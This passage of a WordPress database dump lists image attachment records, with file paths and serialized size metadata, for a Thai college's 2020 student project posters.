9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:116:\"โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27208, 10994, '_wp_attached_file', '2020/12/โครงการคุณธรรม63.jpg'),
(27209, 10994, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:56:\"2020/12/โครงการคุณธรรม63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"โครงการคุณธรรม63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"โครงการคุณธรรม63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"โครงการคุณธรรม63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"โครงการคุณธรรม63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"โครงการคุณธรรม63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27210, 10995, '_wp_attached_file', '2020/12/โครงการเก็บขยะป่าชายเลน63.jpg'),
(27211, 10995, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:83:\"2020/12/โครงการเก็บขยะป่าชายเลน63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:83:\"โครงการเก็บขยะป่าชายเลน63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:83:\"โครงการเก็บขยะป่าชายเลน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:84:\"โครงการเก็บขยะป่าชายเลน63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:84:\"โครงการเก็บขยะป่าชายเลน63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:83:\"โครงการเก็บขยะป่าชายเลน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27212, 10996, '_wp_attached_file', '2020/12/เปิดประชุมอวท63.jpg'),
(27213, 10996, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:53:\"2020/12/เปิดประชุมอวท63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"เปิดประชุมอวท63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"เปิดประชุมอวท63-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"เปิดประชุมอวท63-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:54:\"เปิดประชุมอวท63-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:53:\"เปิดประชุมอวท63-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27214, 10997, '_wp_attached_file', '2020/12/โครงการนักเรียน-นักศึกษาต้นแบบ63.jpg'),
(27215, 10997, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:102:\"2020/12/โครงการนักเรียน-นักศึกษาต้นแบบ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"โครงการนักเรียน-นักศึกษาต้นแบบ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:102:\"โครงการนักเรียน-นักศึกษาต้นแบบ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:103:\"โครงการนักเรียน-นักศึกษาต้นแบบ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:103:\"โครงการนักเรียน-นักศึกษาต้นแบบ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:102:\"โครงการนักเรียน-นักศึกษาต้นแบบ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27216, 10998, '_wp_attached_file', '2020/12/19-โครงการประกวดร้องเพลง63.jpg'),
(27217, 10998, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:80:\"2020/12/19-โครงการประกวดร้องเพลง63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:80:\"19-โครงการประกวดร้องเพลง63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:80:\"19-โครงการประกวดร้องเพลง63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:81:\"19-โครงการประกวดร้องเพลง63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:81:\"19-โครงการประกวดร้องเพลง63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:80:\"19-โครงการประกวดร้องเพลง63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27218, 10999, '_wp_attached_file', '2020/12/โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63.jpg'),
(27219, 10999, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:131:\"2020/12/โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:131:\"โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:131:\"โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:132:\"โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:132:\"โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:131:\"โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27220, 11000, '_wp_attached_file', '2020/12/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63.jpg'),
(27221, 11000, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:136:\"2020/12/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:136:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:136:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:137:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:137:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:136:\"4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27222, 11001, '_wp_attached_file', '2020/12/โครงการส่งเสริมทักษะภาษาต่างประเทศ.jpg'),
(27223, 11001, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:114:\"2020/12/โครงการส่งเสริมทักษะภาษาต่างประเทศ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:114:\"โครงการส่งเสริมทักษะภาษาต่างประเทศ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:114:\"โครงการส่งเสริมทักษะภาษาต่างประเทศ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:115:\"โครงการส่งเสริมทักษะภาษาต่างประเทศ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:115:\"โครงการส่งเสริมทักษะภาษาต่างประเทศ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:114:\"โครงการส่งเสริมทักษะภาษาต่างประเทศ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27224, 11002, '_wp_attached_file', '2020/12/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63.jpg'),
(27225, 11002, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:116:\"2020/12/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:116:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:116:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:117:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:117:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:116:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27226, 11003, '_wp_attached_file', '2020/12/14-โครงการสร้างแรงบันดาลใจ.jpg'),
(27227, 11003, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:84:\"2020/12/14-โครงการสร้างแรงบันดาลใจ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:84:\"14-โครงการสร้างแรงบันดาลใจ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:84:\"14-โครงการสร้างแรงบันดาลใจ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:85:\"14-โครงการสร้างแรงบันดาลใจ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:85:\"14-โครงการสร้างแรงบันดาลใจ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:84:\"14-โครงการสร้างแรงบันดาลใจ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27228, 11004, '_wp_attached_file', '2020/12/สิ่งประดิษฐ์63.jpg'),
(27229, 11004, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:50:\"2020/12/สิ่งประดิษฐ์63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"สิ่งประดิษฐ์63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:50:\"สิ่งประดิษฐ์63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:51:\"สิ่งประดิษฐ์63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:51:\"สิ่งประดิษฐ์63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:50:\"สิ่งประดิษฐ์63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27230, 11005, '_wp_attached_file', '2020/12/โครงการส่งเสริมกิจกรรมอาสาพัฒนา63.jpg'),
(27231, 11005, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:724;s:6:\"height\";i:1024;s:4:\"file\";s:107:\"2020/12/โครงการส่งเสริมกิจกรรมอาสาพัฒนา63.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:107:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:107:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:108:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:107:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27232, 11006, '_wp_attached_file', '2020/12/9-โครงการสร้างผู้ประกอบการใหม่63.jpg'),
(27233, 11006, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:100:\"2020/12/9-โครงการสร้างผู้ประกอบการใหม่63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:100:\"9-โครงการสร้างผู้ประกอบการใหม่63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:100:\"9-โครงการสร้างผู้ประกอบการใหม่63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:101:\"9-โครงการสร้างผู้ประกอบการใหม่63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:101:\"9-โครงการสร้างผู้ประกอบการใหม่63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:100:\"9-โครงการสร้างผู้ประกอบการใหม่63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27234, 11007, '_wp_attached_file', '2020/12/เทคนิคระยองบัญชี63.jpg'),
(27235, 11007, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2020/12/เทคนิคระยองบัญชี63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"เทคนิคระยองบัญชี63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"เทคนิคระยองบัญชี63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"เทคนิคระยองบัญชี63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"เทคนิคระยองบัญชี63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"เทคนิคระยองบัญชี63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27236, 11008, '_wp_attached_file', '2020/12/ทดสอบมาตรฐานการใช้คอม.jpg'),
